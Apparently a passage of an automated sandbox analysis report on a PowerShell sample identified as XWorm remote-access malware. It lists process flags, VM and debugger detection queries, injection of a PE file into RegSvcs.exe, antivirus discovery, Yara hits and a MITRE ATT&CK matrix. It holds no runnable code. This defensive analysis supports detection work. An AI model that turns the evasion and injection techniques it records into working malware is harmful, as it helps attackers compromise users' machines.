      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4473Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5403Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5856Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3963Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Amcache.hve.0.drBinary or memory string: VMware
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: RegSvcs.exe, 00000004.00000002.3150292171.0000000000FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.0.drBinary or memory string: vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Injects a PE file into a foreign processes
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A0C008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0" Jump to behavior
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected XWorm
      Source: Yara matchFile source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected XWorm
      Source: Yara matchFile source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation      		1
      DLL Side-Loading      		212
      Process Injection      		1
      Masquerading      		OS Credential Dumping241
      Security Software Discovery      		Remote Services11
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
      Virtualization/Sandbox Evasion      		Security Account Manager241
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      System Network Configuration Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Obfuscated Files or Information      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing      		DCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      QP2uO3eN2p.ps124%ReversingLabsWin32.Trojan.Generic
      QP2uO3eN2p.ps128%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
